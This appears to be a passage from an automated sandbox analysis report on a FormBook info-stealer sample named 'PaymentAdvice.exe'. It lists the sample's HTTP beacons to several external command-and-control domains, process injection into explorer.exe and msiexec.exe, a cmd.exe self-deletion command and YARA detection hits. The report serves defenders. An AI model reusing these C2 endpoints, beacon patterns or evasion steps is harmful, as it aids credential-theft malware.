                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                6192.168.2.54973752.142.208.18480C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Apr 8, 2021 12:40:18.180222988 CEST5531OUTGET /c22b/?GPi8=zx0k4ABwBL0XDo/z29LcJNBul5/He8j/Xs403vcVS0JFFGbo2Kaumu3jNTCDwIeMd1g7&ary=tXLpzhFpgBj4m HTTP/1.1
                                                                Host: www.plataformaporelmarcanario.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                7192.168.2.549738104.21.85.23480C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Apr 8, 2021 12:40:24.619865894 CEST5532OUTGET /c22b/?GPi8=5+EjqSxxsqb+AO0KDJIwjNuki1nPzn2WfN0f4mrczTU8JzwykOabyZiChtG34yjy1Q0j&ary=tXLpzhFpgBj4m HTTP/1.1
                                                                Host: www.dajiangzhibo12.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Apr 8, 2021 12:40:24.656661034 CEST5533INHTTP/1.1 301 Moved Permanently
                                                                Date: Thu, 08 Apr 2021 10:40:24 GMT
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Cache-Control: max-age=3600
                                                                Expires: Thu, 08 Apr 2021 11:40:24 GMT
                                                                Location: https://www.dajiangzhibo12.com/c22b/?GPi8=5+EjqSxxsqb+AO0KDJIwjNuki1nPzn2WfN0f4mrczTU8JzwykOabyZiChtG34yjy1Q0j&ary=tXLpzhFpgBj4m
                                                                cf-request-id: 0952aab4340000060534b94000000001
                                                                Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=sRvM3g118sqIQBsa2bsIc7O3QG%2FF3OJi%2B5MHPf3DpyVFNjqMj6brJU2W%2ByxaS2SKHnIfyi3uhVus7xTtchAIR8o5rvHUXPT%2BFkHI7cfSl6iy7l4zcDkm"}],"max_age":604800}
                                                                NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                Server: cloudflare
                                                                CF-RAY: 63cae099ed420605-FRA
                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                8192.168.2.54973975.126.101.23380C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Apr 8, 2021 12:40:29.885621071 CEST5534OUTGET /c22b/?GPi8=IngE1hDMC0iOqAB1zwheuQ4ABgAGAsEfCrT5hUpQaIJD49WyqmbZ7MrR+3GjstBYa8fc&ary=tXLpzhFpgBj4m HTTP/1.1
                                                                Host: www.saturnkorp.net
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Apr 8, 2021 12:40:30.030370951 CEST5534INHTTP/1.1 403 Forbidden
                                                                Server: nginx
                                                                Date: Thu, 08 Apr 2021 10:40:29 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 146
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                9192.168.2.549740199.59.242.15380C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Apr 8, 2021 12:40:35.274482965 CEST5535OUTGET /c22b/?GPi8=cbaAnqZg13PDvDAp4rbrvZjl753VAJ/hVAzUOls5TeU5Jx4pkABxsKYQ71wwJK0guSYZ&ary=tXLpzhFpgBj4m HTTP/1.1
                                                                Host: www.sgdivergence.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Apr 8, 2021 12:40:35.386007071 CEST5536INHTTP/1.1 200 OK
                                                                Server: openresty
                                                                Date: Thu, 08 Apr 2021 10:40:35 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_krJKxvoEtf15lUs2P5mAQq5TZaYYNajKZmmmE6A9Q0EVcBQ8bZrmX79LcThPHtKxYSWGnORZpnzigiOJ3nbBqA==
                                                                Data Raw: 65 65 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6b 72 4a 4b 78 76 6f 45 74 66 31 35 6c 55 73 32 50 35 6d 41 51 71 35 54 5a 61 59 59 4e 61 6a 4b 5a 6d 6d 6d 45 36 41 39 51 30 45 56 63 42 51 38 62 5a 72 6d 58 37 39 4c 63 54 68 50 48 74 4b 78 59 53 57 47 6e 4f 52 5a 70 6e 7a 69 67 69 4f 4a 33 6e 62 42 71 41 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 65 20 72 65 6c 61 74 65 64 20 6c 69 6e 6b 73 20 74 6f 20 77 68 61 74 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 2f 3e 3c 2f 68 65 61 64 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 36 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 36 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 37 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 38 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 39 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 39 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 20 2d 2d 3e 3c 62 6f 64 79 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 67 5f 70 62 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 0a 44 54 3d 64 6f 63 75 6d 65 6e 74 2c 61 7a 78 3d 6c 6f 63 61 74 69 6f 6e 2c 44 44 3d 44 54 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 2c 61 41 43 3d 66 61 6c 73 65 2c 4c 55 3b 44 44 2e 64 65 66 65 72 3d 74 72 75 65 3b 44 44 2e 61 73 79 6e 63 3d 74 72 75 65 3b 44 44 2e 73 72 63 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 22 3b 44 44 2e 6f 6e 65
                                                                Data Ascii: ee4<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_krJKxvoEtf15lUs2P5mAQq5TZaYYNajKZmmmE6A9Q0EVcBQ8bZrmX79LcThPHtKxYSWGnORZpnzigiOJ3nbBqA=="><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title></title><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="description" content="See related links to what you are looking for."/></head>...[if IE 6 ]><body class="ie6"><![endif]-->...[if IE 7 ]><body class="ie7"><![endif]-->...[if IE 8 ]><body class="ie8"><![endif]-->...[if IE 9 ]><body class="ie9"><![endif]-->...[if (gt IE 9)|!(IE)]> --><body>...<![endif]--><script type="text/javascript">g_pb=(function(){varDT=document,azx=location,DD=DT.createElement('script'),aAC=false,LU;DD.defer=true;DD.async=true;DD.src="//www.google.com/adsense/domains/caf.js";DD.one


                                                                Code Manipulations

                                                                Statistics

                                                                Behavior

                                                                Click to jump to process

                                                                System Behavior

                                                                General

                                                                Start time:12:38:35
                                                                Start date:08/04/2021
                                                                Path:C:\Users\user\Desktop\PaymentAdvice.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Users\user\Desktop\PaymentAdvice.exe'
                                                                Imagebase:0x400000
                                                                File size:357134 bytes
                                                                MD5 hash:91937D3F9E93657C18129FF519B7F340
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.237687688.0000000002680000.00000004.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.237687688.0000000002680000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.237687688.0000000002680000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                Reputation:low

                                                                General

                                                                Start time:12:38:36
                                                                Start date:08/04/2021
                                                                Path:C:\Users\user\Desktop\PaymentAdvice.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Users\user\Desktop\PaymentAdvice.exe'
                                                                Imagebase:0x400000
                                                                File size:357134 bytes
                                                                MD5 hash:91937D3F9E93657C18129FF519B7F340
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000001.233939392.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000001.233939392.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000001.233939392.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.277986099.00000000006B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.277986099.00000000006B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.277986099.00000000006B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.277857898.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.277857898.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.277857898.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.278046129.00000000006E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.278046129.00000000006E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.278046129.00000000006E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                Reputation:low

                                                                General

                                                                Start time:12:38:44
                                                                Start date:08/04/2021
                                                                Path:C:\Windows\explorer.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:
                                                                Imagebase:0x7ff693d90000
                                                                File size:3933184 bytes
                                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                General

                                                                Start time:12:38:56
                                                                Start date:08/04/2021
                                                                Path:C:\Windows\SysWOW64\msiexec.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\SysWOW64\msiexec.exe
                                                                Imagebase:0xb00000
                                                                File size:59904 bytes
                                                                MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.493924242.00000000007A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.493924242.00000000007A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.493924242.00000000007A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.492784662.0000000000380000.00000040.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.492784662.0000000000380000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.492784662.0000000000380000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.494092321.00000000007D0000.00000004.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.494092321.00000000007D0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.494092321.00000000007D0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                Reputation:high

                                                                General

                                                                Start time:12:39:00
                                                                Start date:08/04/2021
                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:/c del 'C:\Users\user\Desktop\PaymentAdvice.exe'
                                                                Imagebase:0x980000
                                                                File size:232960 bytes
                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                General

                                                                Start time:12:39:01
                                                                Start date:08/04/2021
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7ecfc0000
                                                                File size:625664 bytes
                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                Disassembly

                                                                Code Analysis

                                                                Reset < >